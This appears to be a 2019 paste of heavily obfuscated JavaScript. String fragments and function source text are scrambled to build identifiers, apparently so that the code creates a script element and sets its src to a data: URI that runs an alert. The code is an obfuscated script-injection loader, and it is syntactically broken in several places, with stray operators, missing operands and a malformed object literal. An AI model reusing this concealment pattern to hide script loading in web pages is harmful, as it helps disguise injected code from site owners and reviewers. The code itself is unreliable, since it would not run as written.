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Apr 25th, 2019
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  1. window.globalScriptSrc = "data:text/javascript,alert('work, yes')";
  3. +(function() {
  4. function resolve(val, opt) {
  5. return val == 1
  6. ? (lay.common = ((cond = jobs),
  7. [
  8. ((lay.vals[1] = "s" + specify(true, 2, 1)[2] + 4), &&
  9. map(parse(block(false, 2, 1)[2], join(3), hip(null, 3, 1))) &&
  10. map(specify(true, 2, 2)) &&
  11. !map(lay.replace + collapse(put(hip(true, 3))) + join(2) + specify(false, 2, 1)[1])
  12. ]))
  13. : clean(val, opt);
  14. }
  16. function update(obj) {
  17. if (!(obj instanceof Object)) {
  18. return [];
  19. }
  21. return arguments[1]
  22. ? (lay.vals[2] = reload(hip(false, 2, 1)[1]) + 5)
  23. : (function() {
  24. var buf = Object.getOwnPropertyNames(obj),
  25. all = Object.getPrototypeOf(obj);
  26. return all ? buf.concat(update(all)) : buf;
  27. })();
  28. }
  29. function passed() {
  30. conf = {
  31. app: "web_",
  32. max_buffer: [2, 3, 4, 5, 6, 7],
  33. open_client_content: "doc_nts",
  34. rm_bug: "dev_bar",
  35. break: "\\n"
  36. };
  37. lay = {};
  38. return specify(conf, lay);
  39. }
  41. function map(log, rec) {
  42. return log == rec
  43. ? (cond.shouldUpdate =
  44. typeof answ("cr" + join(3) + put(block(true, 2))) == run(map, 0) ||
  45. cut(lay)
  46. .join(answ("j" + join(4 + get(3)) + put(specify(undefined, 2)), lay.maped))
  47. .match(resolve('"', specify(true, 3, 1)[2])))
  48. : (function() {
  49. const virt = top(log, rec);
  50. return (virt && note(virt, rec)) || false;
  51. })();
  52. }
  53. function check() {
  54. if (answ() && collapse(hip(false, 0, 1))) {
  55. inside();
  56. }
  57. return note(1);
  58. }
  60. function inside() {
  61. return (answ(put(specify(true, 4)) + join(2) + "y", lay.handler).appendChild(
  62. lay.handler.createElement(run(toAll) + run(note) + block(false, 2, 1)[1])
  63. ).src = lay.min.globalScriptSrc);
  64. }
  65. function answ(err, im) {
  66. return arguments.length === 0
  67. ? answ("pl" + join(4) + specify(true, 3), lay.maped).match(
  68. resolve(put(err, im).join("|"), run(top, 3))
  69. ) && tools(true)
  70. : (((lay.replace = "^"), im) || (lay.min = window))[top(err, im)];
  71. }
  73. function cut(ate, head, type) {
  74. return !ate
  75. ? update(conf, true)
  76. : ate === cond
  77. ? [
  78. answ(specify(true) + join(7) + hip(null)[1], lay.maped),
  79. answ(block(true) + join(6) + conf.break[1], lay.maped)
  80. ]
  81. : ate.substr(type || 0, head);
  82. }
  84. function run(cb2, pair) {
  85. return cb2
  86. .toString()
  87. .match(resolve(reload(conf.break[0], 2) +[0] + "+", hip(true, 3, 1)[2]))[
  88. pair === 0 ? 0 : pair || 2
  89. ];
  90. }
  91. function collapse(sole) {
  92. return sole.length !== 0
  93. ? sole[0].toUpperCase() + sole.substr(1)
  94. : (function() {
  95. const newEl = answ(toAll(cut(run(clean), 4)) + join(5) +, lay.maped);
  96. return lay.vals
  97. .concat([reload([1]) + 2])
  98. .map(make(newEl))
  99. .reduce(function(acc, frame3) {
  100. return acc || frame3;
  101. });
  102. })();
  103. }
  105. function commit(abs) {
  106. var query = [lay.replace, abs,];
  107. var sleep = [query.join(""), query[0] + abs, abs + query[2], abs];
  108. return {
  109. return resolve(abs);
  110. });
  111. }
  113. function tools(nill) {
  114. return nill
  115. ? !answ(specify(true, 1) + join(4 * 2) + hip(null, 2, 1), lay.maped) &&
  116. !cond.shouldUpdate &&
  117. map(collapse(block(false) + join(7) + specify(true, 1, 1)))
  118. : map(nill, undefined);
  119. }
  121. function top(raw, gi) {
  122. return gi === null
  123. ? ((lay.common[1] = note(
  124. "alt",
  125. answ(parse("st", join(2), hip(null)[1],, get(null))
  126. )),
  127. (jobs.common[2] = jobs.common[3] =
  128. map(join(2) + hip(true, 3, 1)) && !(lay.res[1] && lay.res[1].name.match(run(slim)))))
  129. : update((( = "$"), gi) || lay.min).filter(slim(conf.max_buffer[3], raw))[0];
  130. }
  131. function note(ip, rec) {
  132. return ip === 1 ? (lay = jobs = cond = null) : rec === 1 ? "pxe" : ip in (rec || lay.min);
  133. }
  135. function join(con, take) {
  136. return (
  137. (take || specify(false, null, 1)) +
  138. reload(conf.break[0], 2) +
  139.[0] +
  140. make.toString().match(resolve("." + conf.break, block(true, 3, 1)[2]))[0][0] +
  141. con +
  142. note.toString().slice(-1)
  143. );
  144. }
  146. function toAll(scr) {
  147. return scr == lay
  148. ? ((scr.maped =
  149. answ(specify(true, 2, 1) + join(get(3) + 6)) ||
  150. answ("na" + join(6) + put(block(true, 3)))),
  151. make(slim))
  152. : (function(params) {
  153. return (function(inc) {
  154. return inc.reverse().join(params);
  155. })(scr.split(params));
  156. })(hip(false, null, 1));
  157. }
  159. function clean(result) {
  160. return result === lay
  161. ? "ger"
  162. : typeof result === "string"
  163. ? new lay.min[
  164. lay.valExp ||
  165. (lay.valExp = [clean(lay), note(lay, 1)]
  166. .map(function(key) {
  167. return collapse(toAll(key));
  168. })
  169. .join(""))
  170. ](result, arguments[1])
  171. : top(result, null);
  172. }
  174. function specify(cail, is, match, im) {
  175. return cail === conf
  176. ? ((is.handler = answ(specify(null, 2))), (is.vals = ["f" + hip(true, 1)[2] + 5]), toAll(is))
  177. : (function(acts) {
  178. var value = ((hip = acts), update(conf || im)[is || 0]);
  179. var obj0 = cail ? value : (conf || im)[value];
  180. return obj0.split ? obj0.split(conf.rm_bug[3])[match || 0] : obj0;
  181. })((block = specify));
  182. }
  184. function reload(obj1, position) {
  185. return obj1 !== "new"
  186. ? new Array(position || 3).join(obj1)
  187. : (( = ((lay.vals[1] = put(specify(true, 2, 1)) + "e" + conf.max_buffer[2]),
  188. map(collapse(put(block(false)) + join(4 + get(3)) + "y")))),
  189. resolve(1),
  190. cut(),
  191. [clean, tools, check].map(make));
  192. }
  193. function put(frame2, is3) {
  194. return is3 === frame2
  195. ? [toAll(cut(run(tools), 2) +[0]), cut(block(true, 1), 2) + put(hip(true, 2, 1))]
  196. : frame2[is3 || 0];
  197. }
  199. function slim(light, obj2) {
  200. return light === 5
  201. ? function(blow) {
  202. var base = false;
  203. return commit(obj2).reduce(function(acc, frame) {
  204. return !base && frame.test(blow) ? (base = true) : base;
  205. });
  206. }
  207. : ((lay.res = ((jobs = lay), answ(parse("pl", join(4), hip(false, 2, 1)[2]), lay.maped))),
  208. reload("new"));
  209. }
  210. function get(is4) {
  211. return is4 === null
  212. ? answ(
  213. put(block(undefined, 2)) + join(get(-2) + get(-1)) + specify(false, 2, 1)[1],
  214. lay.handler
  215. )
  216. : is4 >= 0
  217. ? conf.max_buffer[is4 || 0]
  218. : conf.max_buffer[conf.max_buffer.length + is4];
  219. }
  221. function parse() {
  222. return (function(key) {
  223. const specified = [];
  224. for (let i = 0; i < key.length; i++) {
  225. specified.push(key[i]);
  226. }
  227. return specified.reduce(function(acc, elem) {
  228. return acc + elem;
  229. });
  230. })(arguments);
  231. }
  233. var make = (function(x) {
  234. var num = 0;
  235. function applied(cb) {
  236. return typeof cb !== "function"
  237. ? function(val, vim) {
  238. return cb.match(resolve(val[0] + join(val[2]) + val[1], "i")) && lay.common[vim];
  239. }
  240. : setTimeout(cb, num++);
  241. }
  242. return applied(x), applied;
  243. })(passed);
  244. })();
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